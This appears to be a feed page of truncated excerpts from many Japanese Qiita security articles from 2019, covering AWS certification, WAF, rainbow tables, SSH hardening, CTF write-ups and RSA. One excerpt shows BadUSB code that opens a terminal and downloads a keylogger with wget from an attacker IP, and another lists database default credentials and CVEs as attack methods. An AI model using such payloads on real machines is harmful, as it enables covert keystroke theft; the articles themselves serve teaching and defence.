今さら聞けないセキュリティ　2019年12月11日

AWS 認定セキュリティ – 専門知識 受験対策

先日合格したAWS認定スペシャリティ-セキュリティ試験について、自分が行った対策を紹介します。

## 試験範囲
試験ガイドに記載の通りです。
「インシデント対応」「ログと監視」「インフラストラクチャのセキュリティ」「ID及びアクセス管理」「データ保護」の5分野について
他のプロフェッショナル試験や専門知識同様、170分の試験になります。（受験料：30,000円）

## 受験対策
受験にあたり自分が行った対策は以下になります。

### AWSのセキュリティ関係のサービスのBlackbeltを読む
https://aws.amazon.com/jp/aws-jp-introduction/aws-jp-webinar-service-cut/
「AWS クラウドサービス活用資料集」の「Security, Identity & Compliance」に分類されているサービスのBlackbeltに全て目を通しました。
IAMやKMSについてはYouTube動画もあり、理解しやすいです。

Security, Identity & Complianceに分類されていたのは以下の通りで

Web Application Firewall(WAF) on Azure Application Gateway を導入した

[センシンロボティクス Advent Calendar](https://qiita.com/advent-calendar/2019/sensyn-robotics) 11 日目です。

こんにちわ。@kotetsu-sr です。2019年1月にセンシンロボティックスに参画しました。この一年、ドローン周辺の動画配信システムの構築、システム全体のインフラまわりの色々、DevOps みたいなことをやってきました。センシンロボティクスは [Microsoft For Startups に採択されている](https://www.sensyn-robotics.com/news/microsoft-for-startups)こともあり、Microsoft Azure を活用しています。

半年くらい前の話になりますが、Azure Application Gateway 上で提供する Web Application Firewall(以下、WAF)を実際に導入したときの記録です。この記事では WAF の詳細や、Application Gateway そのものの導入には触れません。また Azur

Rainbow Table Attack の理解と実践

# TL;DR
[VALU Advent Calendar 2019](https://qiita.com/advent-calendar/2019/valu)の10日目の記事です。

# パスワードとハッシュの関係
一般的なサービスにおいて、パスワードは平文で保存されるのではなく、ハッシュ関数によってハッシュ化されて保存されます。ハッシュ関数は一方向性関数であり、復号化は通常の方法ではできない仕様です。
ユーザーがパスワードを入力するたびに、パスワードはハッシュ値に変換され、すでに格納されているハッシュ値と比較されます。値が一致する場合、ユーザーは認証されます。これが現代の一般的な現代のパスワードの保存方法です。

# Rainbow Table とは
Rainbow Tableは、パスワードのハッシュ値を解読してパスワードを取得するために使用されるデータベースです。これは、プレーンテキストのパスワードとそれに対応するハッシュ値からなる、あらかじめ計算された辞書で、どのプレーンテキストのパスワードが特定のハッシュ値を生成するかを調べるために使うことができます。

# Rainbow

CTF例題のデータベース脆弱性まとめ

年末年始大学授業も忙しくて、セキュリティノートを書くことをずいぶん忘れてしまった。

**データベースをめぐるセキュリティホール、脆弱性などセキュリティ問題は、ほとんどSQLインジェクションでしょう。**

#mysql
default port：3306
攻撃手法：
1,弱いパスワード、デフォルト設定そのまま使う:アカウント名：’localhost’@’@”　パスワードは任意
2,DOS攻撃（shellおよびHigh権限が必要）
3,CVE-2012-2122など

#PostgreSQL
default port：5432
攻撃手法：
1,弱いパスワード設定： postgres postgres
2,buffer-overrun（バッファオーバーラン）：CVE-2019-10164
3,CVE-2014-2669
4,CVE-2018-1058など

#Oracle
default port：1521
1158
8080
210
それぞれは、データベースポート、Oracle-EMCTL、Oracle-XDB、Oracle-XDB FTPサービス。

問題点：パラメータの設置ミス：

リモートワークする時に気を付けている事。（喫茶店・カフェ編）

###はじめに
　こんにちは。K’s Software Designです。初めて投稿します。よろしくお願いします。

　リモート（自宅、喫茶店、シェアオフィスなど）でお仕事をさせてもらって一年。意外と（？）外は無防備なネット―ワークだらけ。リモートワークする時に私達が気を付けているいるポイントが皆様のお役に立てれば幸いです。

###出かける前に

　・ソフトウェアは最新にしておきましょう。
　・マルウェア対策ソフトのインストール及びアップデートをしておきましょう。

　リモートで仕事をしなくても、自分を守る為には基本的な事の一つだと思いますので習慣づけておくと良いと思います。
　ここでのポイントは、これらを管理された安全な場所で行う事だと思います。ご自宅でお仕事を主にされている方は、自宅でアップデート作業を行うと思います。ご自宅を管理された安全な場所にする方法は、また別の機会に紹介させて頂ければと思います。

###接続する前に利用しようとしているWifiのSSIDを確認しましょう。

　近くで偽のアクセスポイントを設置している人がいるかもしれません。SSIDやパスワードは定期的に変

FileMakerでセキュアーにパスワード認証をする（2）

昨年のアドベントカレンダーに書いた、[FileMakerでセキュアーにパスワードを認証をする](https://qiita.com/HAZI/items/e7d4c1e10ed43be29c8f) の続きです。

## 振り返り

前回の内容を簡単にまとめると

– パスワードは復号可能な状態で保存することはアンチパターンとして有名で、`CryptEncrypt` で暗号化して保存、 `CryptDecrypt` で復号して認証ということを行うのはやってはいけません。
– DBの管理者がパスワードを知ることができるのは、利用者にとって大きなリスクです。
– 利用者に他で使っているパスワードを使わないように完璧に強要するのは無理ですし、パスワードをどこかにメモする危険性があります。
– なので、パスワードを復号できない状態に暗号化して認証しましょう。
– それにはハッシュ化、ストレッチング、ソルトという方法がありますよ。

という内容で、作成したハッシュ関数を公開しました（その他詳細は[前回の記事](https://qiita.com/HAZI/items/e7d4c1e10ed

Yubikeyでもろもろ検証してみました話

[Wano株式会社](https://wano.co.jp/)で社内のいろいろを担当しているakimiです。

この記事は[Wano Group Advent Calendar 2019](https://qiita.com/advent-calendar/2019/wano-group)の10日目の記事にして、わたくし初めてQiitaに投稿する記事となります！

2019年10月ごろにYubikeyを購入して検証した内容を綴っていきます。

# Yubikey検証の目的
OSログインとGoogleログイン時の2段階認証目をYubikeyでやりたい！

また、検証の目的はログイン簡素化ではなく、従来のID・パスワードログイン後の2段階認証目をYubikeyを使用することで2要素認証を実現、セキュリティ強化を目的としています。（ここ重要）

# 前提知識（かんたんに）
**【FIDO（ファイド）】**
Fast IDentity Onlineの略で、従来のパスワード認証に代わる認証技術で、標準規格策定団体である[FIDO Alliance](https://fidoalliance.or

ENISAのトレーニング資料やってみた

# 目次
– 概要
– ENISAのトレーニング資料やってみたシリーズについて
– デジタルフォレンジックって何？
– デジタルフォレンジックってどう手順でやるの？
– デジタルフォレンジックって種類とかあるの？

# 概要
今シリーズでは[ENISA](https://www.enisa.europa.eu/topics/trainings-for-cybersecurity-specialists/online-training-material/technical-operational)というヨーロッパのCSIRTが出しているトレーニング資料を使って、
デジタルフォレンジックとマルウェア解析を勉強していきたいと思います。
# これからやる内容
今回使用する資料は以下の5つを使っていきます。
– Forensic analysis: Local Incident Response（パート１）
– Forensic analysis: Network Incident Response（パート２）
– Forensic analysis: Webserver Analysis（パ

仙台CTFWrite-up

# 概要
先月に仙台CTFに参加してきました！
面白い問題ばかりでとても勉強になりました。来年も機会があれば参加したいと思います。
問題のジャンルはopenworld（独自）、ネットワーク、フォレンジック、マルウェア、制御システム系でした。
制御システム系以外のジャンルを随時アップしていきたいと思います。

# openworld
## 1. 状況確認 100
### ［問題の背景］ インシデント発生日時： 2019年11月04日（月）

– 本日23:42頃、あなたが離席中に、営業所の社員スズキさんから、不審メールが届いたとの電話連絡あったようです。必要な調査・対応を実施してください。

### ［問題］
– スズキさんに電話連絡し状況を確認してください。
オープンワールドのスズキさんをクリックすると、証言を確認できます。

### ［フラグ］
スズキさんの証言の『 』で囲まれた文字列（半角、小文字）

例： abc@localdomain.invalid

### 回答
スズキさんの証言を聞くには「オープンワールドURL」をクリックするとネットワーク構成図のような画面ができてきま

短縮URLとは

# 短縮URLとは
**長いURLを短くしたもの。**

**長いURL**
`https://ja.wikipedia.org/wiki/%E7%9F%AD%E7%B8%AEURL#%E5%A4%A7%E6%96%87%E5%AD%97%E3%83%BB%E5%B0%8F%E6%96%87%E5%AD%97%E3%81%AE%E5%8C%BA%E5%88%A5%E3%81%8C%E5%BF%85%E8%A6%81%E3%81%A7%E3%81%82%E3%82%8B%E5%A0%B4%E5%90%88%E3%81%8C%E5%A4%9A%E3%81%84`

**短縮URL**
`https://bit.ly/34wPwhT`

# URLが長くなる原因
**基本的にURLとして使える文字は、英数字と一部の記号のみです[^1]。
英数字以外（日本語など）がURLにあると英数字にエンコードをしなければなりません。**
例えば、上記の長いURLは、実際のサイトでは以下の様に表示されています。
“`https://ja.wikipedia.org/wiki/短縮URL#大文字・小文字の

yamory vs Snyk ~trialしてみた所感~

アソビュー株式会社でSREをやっている[zurausa](https://twitter.com/zurausa77)です。
この記事は[asoview! Advent Calendar 2019](https://qiita.com/advent-calendar/2019/asoview) 9日目の記事となります。

#はじめに
当記事はまだ導入検討している段階の試用によって出てきたものであり、一個人の感想です。
また検索結果等は本来有償のツールですので、両製品のスキャン結果のデータ部分は
あまり扱わないように気をつけています。

また本職のセキュリティエンジニアではないため、観点等おかしい部分があるかと思います。

#yamoryとかSnykとは
OSSの脆弱性を検出・解消するセキュリティプラットフォームです。
自分たちが書いたソースコードのロジックではなく、利用しているライブラリに存在する
脆弱性を発見して管理してくれます。

##yamoryとは
2019年８月に株式会社ビズリーチがリリースした製品です。[製品ページ](https://yamory.io/)
リリースしてから

Webサービスのセキュリティを強化する方法を考えてみた

　こんにちは！@wakky_404です。

　この記事は[Ateam Hikkoshi Samurai Inc. & Ateam Connect Inc.（エイチーム引越し侍、エイチームコネクト） Advent Calendar 2019](https://qiita.com/advent-calendar/2019/hikkoshi) 8日目の記事になります。

　今回、**過去の事例(自己含む)からWebサービスや会社のセキュリティを強化する方法**を考えてみました。
　**発言は個人のものになりますが「こんな策も有効ではないか」**など何かあれば優しめにマサカリいただけると大変ありがたいです！！

# きっかけとなった とある朝の出来事
　Advent Calendar何書こう・・・（´-`）.｡oOと平和に考える私の前に一件の不穏なメールが届きます。

**「お客さまのアカウントにログインが行われました」**

　メールの送信元は以前利用していたCtoCアプリで、もちろんログインもしておらず、記載されていたログイン端末も一切心当たりがないもの。
　焦る私は、自身でサービスへロ

ssh接続のセキュリティを高めたい

#sshのセキュリティを高めるために
今回もsshでログインする対象はUbuntu18.04です。
セキュリティを高めるためにやったこと

1. ポート番号変更
2. rootログイン禁止
3. aaa

##1. ポート番号変更

“`
# vim /etc/ssh/sshd_config
“`
でconfigファイルを開いて `Port 22`を探して任意のポートを入力しましょう
ウェルノウンポートなどがあるので考えて決めましょう。
ちなみに#は外さないとコメントアウトになっているので忘れずに外しましょう。

##2. rootログイン禁止

“`
#PermitRootLogin no
“`
同じように`PermitRootLogin`を探して`no`にしましょう

##3. 公開鍵を作成しよう
ここはのち書きますね

BadUSBでキーロガーを仕込む&BadUSB対策

# はじめに
BadUSBでキーロガーを仕込むペイロードを作成しました。ペイロードの解説とBadUSB対策を書きます。

# 概要
1. 攻撃者とターゲットの環境
2. コード&解説
3. 問題点
4. BadUSB対策

# 攻撃者とターゲットの環境
### 攻撃者の環境
ipアドレスが192.168.0.3
apacheでキーロガーを公開しておく

### ターゲットの環境
osがlinux(キーロガーがlinux用のため)

# コード&解説

f2キーとaltキーでターミナルを起動する

“`
void loop() {
DigiKeyboard.sendKeyStroke(KEY_F2, MOD_ALT_LEFT);
DigiKeyboard.print(F(“gnome-terminal”));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
“`

キーロガーをダウンロード

“`
DigiKeyboard.print(F(“wget http://192.168.0.3/share/keylogger.py”));

金融機関システムのクラウド利用でおさえておくべきこと

#はじめに
金融機関システムは厳格なセキュリティが求められますが、それを担保するたのマニュアルや基準が存在します。
さらに、クラウド利用においては、従来のオンプレミスよりも注意すべき点がたくさんあるはずです。
ということで、金融機関システムをクラウドを使って構築する場合に確認すべき文書等を整理してみます。

#FISC
+ 金融情報システムセンター、The Center for Financial Industry Information Systems
+ HP：https://www.fisc.or.jp/
+ 歴史：昭和59年11月　財団法人として設立。平成23年4月、公益財団法人に移行。
+ 概要：https://www.fisc.or.jp/about/
+ 活動の基本は、金融情報システムに関連する諸問題(技術、利活用、管理態勢、脅威と防衛策等)の国内外における現状、課題、将来への発展性とそのための方策等についての調査研究。
+ 調査研究から得られた知見は各種ガイドライン、調査レポートなどに反映している。
+ ガイドラインのひとつに『金融機関等コンピュ

SMBの検出・有効化・無効化　Windows

#概要
>この資料では、SMB クライアントおよびサーバー コンポーネントでサーバー メッセージ ブロック (SMB) バージョン 1 (SMBv1)、SMB バージョン 2 (SMBv2)、SMB バージョン 3 (SMBv3) を有効または無効にする方法について説明します。

[SEO](https://support.google.com/webmasters/answer/7451184)で上位に公式情報が出てこなくて困ったので、このサイトを上位にするのが狙いです。
よく使う[Powershell](https://docs.microsoft.com/ja-jp/powershell/scripting/overview)のコマンドレットだけ表記し、あとは情報ソースの[URL](https://ja.wikipedia.org/wiki/Uniform_Resource_Locator)を貼ります。

##SMBとは
>[Windows Server の SMB 3 プロトコルを使用したファイル共有の概要](https://docs.microsoft.com/ja-jp/

（1か月前に）NRI Secure Netwars 2019に参加してきました

# Netwars2019に行ってきた感想をまとめました

myjlabアドベントカレンダー3日目です。
およそ1か月前のイベント参加記録を放出します。

## はじめに

本記事は11月9日に開催された[NRI Secure NetWars 2019](https://www.nri-secure.co.jp/event/2019/netwars)の参加記録です。

規定により具体的な問題の内容などについて記すことはできないので、オンサイトCTFに初めて参加した記録として、特にCTFに限らず「オフラインイベントへ参加するかどうか迷っている」方の背中を押すためのものとして読んでいただければ幸いです。

## プロフィール

– オンサイト（オフライン）CTF未経験、常設CTFを頑張って解く日々を送る学部3年生

– 学部2年までは企業の情報管理や体制としてのセキュリティについて専攻にしたいと考え、学んでいたが、実際に手を動かす実務的なセキュリティを学ぶ必要性を感じてCTFに手を出し始めた初心者

– その流れで[セキュリティキャンプ](https://www.ipa.go.jp/j

IBM Cloudにオンプレにも適用できるスゲー便利なサービスがあるらしい

これは、[IBM Cloud Advent Calendar 2019](https://qiita.com/advent-calendar/2019/ibmcloud)　7日目の記事です。

# こちらの動画、視たことはありますか？
これは、公開と同時に「IBMっぽくない」「カッコイイ」「映画かと思った」「今までのセキュリティじゃだめなんだっていうのが分かった」などご好評いただいている動画です。IBM Cloudで選べる機能のひとつで、セキュリティ強化とWebのパフォーマンスアップのためのサービス「IBM Cloud Internet Services（CIS）」の[マーケティング映像](https://www.ibm.com/jp-ja/campaign/cloud-internet-services)です。

本記事では動画のラフストーリーをご紹介しながら、「ウフフ」な情報を一挙に公開しちゃいます。

何やら重々しい効果音とともに始まる、とある街の一角。
手にマスクをもち、あやしげな男が仁王立ちしています。
![opening.png](https://qiita-image-s

OkHttpを使った場合にWebViewのJavascriptInterfaceはどう呼ばれるか軽く調べてみた

AndroidのWebViewでは、*addJavascriptInterface*という、JavaオブジェクトをWebViewに埋め込む機能があります。これにより、WebView内で表示しているWebページに埋め込まれたJavascriptから、当該Javaオブジェクトで定義されたメソッドを呼び出せるようになります。

今回は、WebViewでのHTTP通信にOkHttpを利用した時、WebViewのコールバックメソッドはどう呼ばれるか軽く調べてみました。
読むのがめんどくさい方は最後の「まとめ」だけを読んでいただいてもよいです。

## WebViewを使用するActivityの実装
WebViewを使用するActivityのソースコードはこんな感じです。
サンプルコードがお粗末なのはご愛嬌です。

“`kotlin:MainActivity.kt
class MainActivity : AppCompatActivity() {

companion object {
const val TAG = “WebViewTest_”
con

寝てたらRSA暗号ができた話

こんにちは。ぽちゃまと申します。
この記事は[木更津高専 Advent Calendar] (https://qiita.com/advent-calendar/2019/nitkc) 2日目です。

前の記事：[Verilog-HDLで32bit ALUを作った話](https://blog.katio.net/page/verilog-alu)
次の記事：[数式の解釈を考える楽しみ](https://qiita.com/Iwancof/items/270a5d556ab7bb72a7c7)

さて、僕は今高専4年生で課題研究のために研究室に配属されています。
その中でも、暗号(とセキュリティ)の研究室に配属になりました。
ということで、何か暗号を実装したいなと思い、考えた結果「**RSA暗号**」でした。
そして、理論を勉強した後に寝たらRSA暗号ができていました(??????????)。

ということで、寝てたらRSA暗号が生やすために、まずは理論を一緒に学んでいきましょう。

# RSA暗号の実装(理論編)

## RSAとは何か
>RSA暗号とは、桁数が大きい合成数の素因数